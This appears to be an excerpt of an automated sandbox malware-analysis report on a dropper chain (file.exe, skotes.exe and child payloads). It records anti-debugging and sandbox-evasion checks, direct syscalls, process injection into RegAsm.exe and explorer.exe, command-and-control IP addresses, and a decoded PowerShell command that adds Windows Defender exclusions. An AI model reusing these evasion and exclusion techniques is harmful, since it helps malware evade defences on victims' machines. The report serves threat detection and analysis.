                            Source: RegAsm.exeBinary or memory string: YOeGR8Q2ZuYSB1CubmVm/jNzB2QeMuLW/5KzBxdn7O919yYiB3XmxZcnl6b3llb2IxenZ4eG5nZVpjenvmdhHu/EBk0DMkblm3PTBuoSAla3dw4npwaidZ/P5PcX5aYXpoWmBEdQhuaHR7emhCZl/j5Uh2hTYgZw+fKzBxdvJhd3J7ZHRDdG5pc216YoBur2MDfRZvImpn5/hdemUxOmFOdzcubDIrJHF8c+59cmQPWXurdmkTaVkJ/1p6EzQmYGYq5A
                            Source: RegAsm.exeBinary or memory string: bnFyeXom+20n4j9efjonPDAuOi4vMCIxNi7rnoxsd27lMBLyIwr7FQfgIhb/7Vb6Z29u5uZV4HBhZuPGQPR3bm745l3mbnBkJ+AySjrioyJULn4j8TBUPFJnJvktRDtdJ3kUMXUAkCzkOksyRThqJuz2jm96cTz7KD4jQS4kPuUsIRQxdQCyLVwpM3VfHVZ6aEYSS1o1e1klQlo2a0U7Si41fVAuSiAgYEIvXhYtfUMDSx4rdVjYVOFmanICJHgAhjj5
                            Source: RegAsm.exeBinary or memory string: G5gZG8ZZjL1q1Ui7CaWJ1GwPPOhniLxnHMAdIY59mV65LMs5DdXEj7iBk4XJ+2rOjAqLzylgliccHeiojn7JV5mOO0bT2MtPuqeSi/kN2cz+oQ4Sn8i+Z0ktpVsOfeiD2pCpIRNO/mNaAR7L+Skh/PKi4/qplmgLJuEhWxCoDHxYcBlJwih8WL4+3wv5DJLSjn/BEVeIvGgTCitojn5vTLnKGwn4gNqPuAKcivmDk8vMCIxNi7hnizvmy4j+pMw8Z407
                            Source: RegAsm.exeBinary or memory string: bnSqFCxjCa/lsDq4knYx7+vo8wdNac+amGxuJ/EtUEApVas67xhTVgg5fQebJ/kgUGM/8acl+RZDLyJMrxc9fx+9DH0LmBFhAYo98nZcP+8rWXsz/ag6nYYnbZ8ycq476HpYOu+qPl2rOEGgMec0VmciQIo74rki7jNKXzZSuTjoEk5KKedzVyf6PkByJ/ukJpyQNnWTOuEzSyYneaE5+V1fIvmmIUSWJkI2XRomQ7Un6B9eJmg74yNWZiPzDVAwKe8+
                            Source: RegAsm.exeBinary or memory string: xuH1ibjn5tvGej3FmYX96858HXoxmJuS1jmGKaGpqOu8oUy4mSPZdum5wZBpxO/EyTQIiXutKn3pxdAVqLq3x7Gx3bm5xcnky5cRAP2pzej7izk4/bm5vMvCwMGBmaimnoLuior2+tbYm+ThLezvzGk1qPDAuOi4vMCI44ooqP++MP+WcOfmQMqm3m5CUjDKJrhTpWxVuGozKcHBhZiL/cQBUdG41+boy5b6Myi15ejNan++nKuWaO37gtuSmHj7nk3Q
                            Source: file.exe, 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                            Source: RegAsm.exeBinary or memory string: 6ZOzLjdTKeloyRTyH5KU8k41vMPflEkeWVcxF8n0SAgY0x8aY473+UIWr9kToJoCbla7w58bAUaiL5J0Q/5WqBmXtJrjjvM09DMv0FVlIv5BpLOjn/DEUuIvGgTDYwrTn7JV5mOO0DT2My/x1WcjAuOi4vMCIxNi7pnkRfpdducXB5khrskpAj+KI+4HeoelZuJ/f5dGBhZiL7adBqV245//F6TnBkJ+J+zGtQciLq525fenE8+WzWd0tkJPrmbjFyeT
                            Source: RegAsm.exeBinary or memory string: jn/BEUuKy0lMjYzLy0tkI+Uj5ujI/omUnEnPDAuOi4vMCIxNi7n3kDsgpGROfOV+mVwZCfgdtQRcHIiVKsm5v8BfnBh7Ch6KOFSzHa9jT3xf4a8I+C6Mv89VgrsPmp0uvKUbSnvJlY877d3K0KpPP+8+SBLOz73N2E24/pfbW96NHs4siPhgSBXpS/jKlQ48aw175RkMLgz4pkuTL/lpzZytTToMk5GLeE2ZiL4Nl0KJnOmIuYicj7gNk4PLkWv8zVQM
                            Source: RegAsm.exeBinary or memory string: ifosho+4qciZKCGoahtdHHWhmpyZIVtkZGO8bGFJvs4S1s78RpNSiLsG0ovMvoIVCku6bZELSitojn7JV5mOO0bT2sy/xVWSjIuOi4vMCIxNi7hnizvm15hx3A18Z/7ae51S3o/4oMv7I8m5IBKtQMNImXEDm0212lxcnk+YcYmbS5Qk0W7P0mmCec5Yjj/NkEs536MJP5gJ/o0WTDjfKQn4j1y/C5xqo9tSmx1x7QW6CBw/yZpM1WGBGcx9zl0IeIqj
                            Source: RegAsm.exeBinary or memory string: Mnp2aitwLK6KdjNVroFlGGtvCT74AX5udmw67wBTJp1+DT17fhYg5h19hXUh+TZDLybkDlUkOOKiSjM7LSkxrTn7JV5mOO0bT2My/xVWcjIuOi4vMCIxNi7hnizvmy4j+oMw8bY875Uj+Is+4gt6L+Rjsfo7dH82pmVjIYw202t1cnkcKvkJgSP4P54gzmpnb25veo6LOUKiInmlJP4rhpkdpkpu+SGPJ/i1O+K1Iuo6jifxv5zOnJmV4izneuTuO3Ix
                            Source: RegAsm.exeBinary or memory string: SvlvfGztbBoJ6u4ayhEvipCoPIuSmClrWT4uEUtVnImXKsr8bm1uGgnq7NrKESm5TVWObuudyBcozLxsC1BoESpKlw2VWwx6rAvQamttWIqQn5dPuc8QEMu/vC4Kk+vI2ykLruwczRqpiv5pV+1KuUVVkU+5RxAWypwvTLiDk5XLm2vO/qnsadvWaEhX4sqbYmzsncvU7Yq4LQ7Rbo3YaEubb4+UrIxYrJppe+W/KyvsXu4tWFDnFyR+C5SbbOoaOSsX
                            Source: RegAsm.exeBinary or memory string: 54Udubm+S/Wh0YS7h+Uxtd26G8W59eib7739qc3qeHW5uZyft1HJ0dHBhEn4676efHM9xcjHx5Xhhb2ub/O1pciLs5H5qenGcCvpmajrv529rbnE69G+6A0FvKsvicmlyggbRa28y+r+YWH9qcizn/OZqcXKR165wZCfg+BJhaXIi6nrJHF9xNcj8YmpyjFjJa245+fJCaHBkJ+Zm9AVMcivfz2pveplvzmRmIvnvBHBubpktloWROO/k43V6diH/fw4
                            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Hides threads from debuggers
                            Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeThread information set: HideFromDebugger
                            Potentially malicious time measurement code found
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0566040F Start: 05660432 End: 056603DA0_2_0566040F
                            Tries to detect sandboxes and other dynamic analysis tools (window names)
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeOpen window title or class name: regmonclass
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeOpen window title or class name: gbdyllo
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeOpen window title or class name: procmon_window_class
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeOpen window title or class name: ollydbg
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeOpen window title or class name: filemonclass
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeFile opened: NTICE
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeFile opened: SICE
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeFile opened: SIWVID
                            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeProcess queried: DebugPort
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05660C36 rdtsc 0_2_05660C36
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043B480 LdrInitializeThunk,36_2_0043B480
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D38077 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00D38077
                            Source: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exeCode function: 7_2_00402981 GetVersionExA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_00402981
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF652B mov eax, dword ptr fs:[00000030h]0_2_00EF652B
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFA302 mov eax, dword ptr fs:[00000030h]0_2_00EFA302
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0073A302 mov eax, dword ptr fs:[00000030h]1_2_0073A302
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0073652B mov eax, dword ptr fs:[00000030h]1_2_0073652B
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D4E1A9 mov edi, dword ptr fs:[00000030h]31_2_00D4E1A9
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D317D0 mov edi, dword ptr fs:[00000030h]31_2_00D317D0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D317D0 mov edi, dword ptr fs:[00000030h]36_2_00D317D0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D39E16 GetProcessHeap,31_2_00D39E16
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exeCode function: 7_2_00402A30 EntryPoint,SetUnhandledExceptionFilter,GetStdHandle,Beep,ExitProcess,7_2_00402A30
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D38077 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00D38077
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D339F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00D339F1
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D339E5 SetUnhandledExceptionFilter,31_2_00D339E5
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D32F82 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00D32F82
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D38077 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00D38077
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D339F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00D339F1
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D339E5 SetUnhandledExceptionFilter,36_2_00D339E5
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D32F82 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_00D32F82
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\explorer.exeNetwork Connect: 154.216.20.243 443
                            Source: C:\Windows\explorer.exeNetwork Connect: 37.203.243.102 3333
                            Source: C:\Windows\explorer.exeNetwork Connect: 185.157.162.216 4444
                            Contains functionality to inject code into remote processes
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D4E1A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,31_2_00D4E1A9
                            Encrypted powershell cmdline option found
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Local\Temp\1015781001\sUSFJjY.exe; Add-MpPreference -ExclusionProcess C:\Users\jones\AppData\Local\Temp\1015781001\sUSFJjY.exe;Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Roaming\IsStopped.exe; Add-MpPreference -ExclusionProcess C:\Users\jones\AppData\Roaming\IsStopped.exe
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Local\Temp\1015781001\sUSFJjY.exe; Add-MpPreference -ExclusionProcess C:\Users\jones\AppData\Local\Temp\1015781001\sUSFJjY.exe;Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Roaming\IsStopped.exe; Add-MpPreference -ExclusionProcess C:\Users\jones\AppData\Roaming\IsStopped.exeJump to behavior
                            Found direct / indirect Syscall (likely to bypass EDR)
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtCreateFile: Direct from: 0x7FFDFAD45FD7
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtResumeThread: Direct from: 0x7FFD9B96F21CJump to behavior
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtQueryAttributesFile: Direct from: 0x7FFDFAD2BC4A
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtQueryAttributesFile: Direct from: 0x7FFDF9C94413Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtOpenFile: Direct from: 0x7FFDFAD332D3
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtQueryValueKey: Direct from: 0x7FFDF82C1DC5
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtQuerySystemInformation: Direct from: 0x7FFDFAC753EE
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtAllocateVirtualMemory: Direct from: 0x7FFD9B95EADDJump to behavior
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtSetInformationProcess: Direct from: 0x7FFDFACAFF46
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtSetInformationThread: Direct from: 0x7FFDFADBC20CJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtAllocateVirtualMemory: Direct from: 0x7FFE221E4B5EJump to behavior
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtReadFile: Direct from: 0x7FFDFAD45F36
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtSetInformationProcess: Direct from: 0x7FFDFACAFF6B
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtProtectVirtualMemory: Direct from: 0x7FFDF8D5B1ACJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtCreateThreadEx: Direct from: 0x7FFDFACE8EE0Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtMapViewOfSection: Direct from: 0x7FFDFAD4A7F5
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtCreateFile: Direct from: 0x7FFDF9C9517FJump to behavior
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtQuerySystemInformation: Direct from: 0x7FFDF8D51285
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtWriteVirtualMemory: Direct from: 0x7FFD9B97B692
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtDelayExecution: Direct from: 0x7FFDFAC55073Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtSetSecurityObject: Direct from: 0x7FFE221C26A1Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtResumeThread: Direct from: 0x7FFD9B97C95C
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtAllocateVirtualMemory: Direct from: 0x7FFD9B96CE79Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtSetContextThread: Direct from: 0x7FFD9B97BC46
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtOpenKeyEx: Direct from: 0x7FFDFAD287B7
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtWriteVirtualMemory: Direct from: 0x7FFD9B96E362Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtProtectVirtualMemory: Direct from: 0x7FFDFACAFF57
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtAdjustPrivilegesToken: Direct from: 0x7FFDF8D51BECJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtReadFile: Direct from: 0x7FFDF9C8C9C8Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtUnmapViewOfSection: Direct from: 0x7FFD9B96DAB6Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtUnmapViewOfSection: Direct from: 0x7FFD9B97ADE6
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtRequestWaitReplyPort: Direct from: 0x7FFDFAD02EA4Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtQueryVolumeInformationFile: Direct from: 0x7FFDF9C9734CJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtSetContextThread: Direct from: 0x7FFD9B96E916Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtResumeThread: Direct from: 0x7FFDFACE8CF6Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeNtQuerySystemInformation: Direct from: 0x7FFDFACE8FF3Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtProtectVirtualMemory: Direct from: 0x7FFD9B97A5A9
                            Injects a PE file into a foreign processes
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140000000 value starts with: 4D5AJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeMemory written: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140000000 value starts with: 4D5A
                            Injects code into the Windows Explorer (explorer.exe)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 5676 base: 140000000 value: 4D
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 5676 base: 140001000 value: 40
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 5676 base: 1404C8000 value: 20
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 5676 base: 1407FB000 value: 00
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 5676 base: 14081B000 value: 48
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 5676 base: 14081C000 value: 48
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 5676 base: 14081F000 value: 48
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 5676 base: 140821000 value: CE
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 5676 base: 140822000 value: 00
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 5676 base: 140823000 value: 00
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 5676 base: 46A010 value: 00
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6568 base: 140000000 value: 4D
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6568 base: 140001000 value: 40
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6568 base: 1402DD000 value: 58
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6568 base: 14040B000 value: A4
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6568 base: 140739000 value: 00
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6568 base: 14075E000 value: 48
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6568 base: 14075F000 value: 48
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6568 base: 140762000 value: 48
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6568 base: 140764000 value: 00
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6568 base: 140765000 value: 00
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6568 base: 75B010 value: 00
                            Modifies the context of a thread in another process (thread injection)
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeThread register set: target process: 7712Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread register set: target process: 5676
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeThread register set: target process: 3872
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeThread register set: target process: 6568
                            Writes to foreign memory regions
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140000000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140001000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140006000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140008000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C0000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C1000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C2000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C3000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 6C1A88C010Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140000000
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140001000
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140006000
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140008000
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C0000
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C1000
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C2000
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C3000
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 86BB14F010
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe "C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exe "C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe "C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe "C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe" Jump to behavior
